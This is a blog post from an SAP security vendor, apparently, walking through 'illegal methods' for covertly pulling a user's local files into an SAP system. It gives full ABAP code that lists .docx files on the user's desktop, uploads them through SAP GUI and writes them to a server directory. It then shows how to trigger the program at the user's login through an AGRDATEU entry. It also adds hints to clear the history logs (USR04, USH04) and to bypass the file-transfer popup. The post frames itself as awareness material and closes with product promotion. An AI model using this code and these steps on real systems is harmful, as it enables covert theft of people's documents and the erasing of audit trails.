Getting Files from Local PC via SAP GUI with Illegal Methods
Defencemore TeamIntroduction
In this blog post, we will demonstrate how to retrieve local files from a user's desktop via SAP GUI in SAP systems. The method involves creating an ABAP program that runs upon the user's first login and moves selected files to a local server. This technique highlights potential security vulnerabilities that SAP system administrators and security experts should be aware of.
Step-by-Step Guide
Creating the ABAP Program
First, we create an ABAP program in the SAP system to be connected. Below is the program code:
REPORT ZFILE_DOWNLOAD_TO_SERVER_3.
DATA: lv_filename TYPE string,
file_content TYPE string,
lv_file_line TYPE string,
lt_file_data TYPE TABLE OF string.
DATA: filename LIKE rlgrap-filename,
directory LIKE bdschko16-target_dir,
itab_dir LIKE sdokpath OCCURS 0 WITH HEADER LINE,
itab_file LIKE sdokpath OCCURS 0 WITH HEADER LINE,
dstpath LIKE draw-filep.
directory = 'C:\Users\burha\OneDrive\Desktop\'.
" You can use %UserProfile%\Desktop instead of static
dstpath = '/usr/sap/trans/tmp/new_dir/'.
" Chose this directory for easier access to files imported from the local PC
CALL FUNCTION 'TMP_GUI_DIRECTORY_LIST_FILES'
EXPORTING
directory = directory
FILTER = '*.docx'
TABLES
file_table = itab_file
dir_table = itab_dir.
IF sy-subrc <> 0.
" Error handling
ENDIF.
LOOP AT itab_file.
CALL FUNCTION 'GUI_UPLOAD'
EXPORTING
filename = directory && itab_file-pathname
filetype = 'ASC'
TABLES
data_tab = lt_file_data
EXCEPTIONS
file_open_error = 1
file_read_error = 2
no_batch = 3
gui_refuse_filetransfer = 4
invalid_type = 5
no_authority = 6
unknown_error = 7
bad_data_format = 8
header_not_allowed = 9
separator_not_allowed = 10
header_too_long = 11
unknown_dp_error = 12
access_denied = 13
dp_out_of_memory = 14
disk_full = 15
dp_timeout = 16
not_supported_by_gui = 17
error_no_gui = 18
OTHERS = 19.
IF sy-subrc <> 0.
MESSAGE ID sy-msgid TYPE sy-msgty NUMBER sy-msgno
WITH sy-msgv1 sy-msgv2 sy-msgv3 sy-msgv4.
EXIT.
ENDIF.
DATA: lv_server_dest TYPE string.
lv_server_dest = dstpath && itab_file-pathname.
OPEN DATASET lv_server_dest FOR OUTPUT IN TEXT MODE ENCODING DEFAULT.
IF sy-subrc <> 0.
RAISE FILE_OPEN_ERROR.
ENDIF.
LOOP AT lt_file_data INTO lv_file_line.
TRANSFER lv_file_line TO lv_server_dest.
ENDLOOP.
CLOSE DATASET lv_filename.
ENDLOOP.
" Clear history after execution
" Logs tables: USR04 VE USH04
Linking the Program to a Transaction Code
Now let's link the file we created to a tcode. For this, we create a new transaction code using the tcode SE93.
Adding a Row to AGRDATEU Table
Now that we have our tcode, we add a new row to the AGRDATEU table for this program to run the first time the user logs into the system.
Filtering Files for Download
The files will be selected according to the filter we provide in the ABAP program code and registered in the /usr/sap/trans/tmp/new_dir folder of the server.
Security Popup on Login
When the user logs in to the system, the security popup for the file download will be active. This confirmation can be overlooked by careless users. In addition, if desired, it can be changed from the SAP GUI settings or from the registry root of the current computer.
Viewing the Downloaded File
Then, you can see this local file in the application server directory.
SAP GUI Security Settings
SAP GUI security settings did not perform this check before version 7.20. However, after 7.20, the permission section for file upload and download operations has been improved.
Conclusion
Although this vulnerability is unlikely to be exploited, it is important for SAP system administrators to be aware of such methods and take preventive measures. DefenceMore's One Click Audit for SAP can help protect your systems from such attacks.
Contact us to learn more and schedule a free demo of our product that detects security vulnerabilities in SAP systems. Ensure your systems are not only functional but also secure.
SAP Security: A Guide to Secure and Compliant Systems
Unlock the secrets to SAP security with our ultimate guide, exploring best practices for protecting sensitive data, ensuring compliance, and enhancing business operations.
Analysis of Security Audit Log in SAP
Explore the importance of SAP Security Audit Logs in enhancing the security of your SAP environment.
SAP Audit Event Type Codes for Data Updates
Learn how SAP audit event type codes for updates enhance accountability, data integrity, confidentiality, availability, and compliance.
Listing of SAP Open Ports: A Comprehensive Guide
Learn how to check and monitor SAP system ports using various methods including sapcontrol commands, OS-level tools, SAP GUI, and Python scripting.
How to Capture Data Changes in SAP Security Logs
How to Capture Data Changes in SAP Security Logs is essential for tracking SAP system activity. Learn the best practices to monitor and analyze SAP security logs.
Authorization Objects in SAP Systems
Explore the importance of authorization objects in SAP systems and understand the critical tables that play a key role in SAP security.
SAP GUI Versions From a Security Perspective
Understand the importance of keeping SAP GUI versions updated for security and how to plan upgrades effectively.
The Concept of Parameters in SAP Systems
Understand the different types of profile files and system parameters in SAP systems, and learn how DefenceMore's One Click Audit can help ensure their security.
Critical SAP Vulnerability: CVE-2023-40309
Learn about the critical CVE-2023-40309 vulnerability in SAP systems, its impact, and the corrective steps to secure your environment.
Are Your Systems Really Secure?
Discover the vulnerabilities in your SAP systems and learn about DefenceMore's One Click Audit for SAP Systems.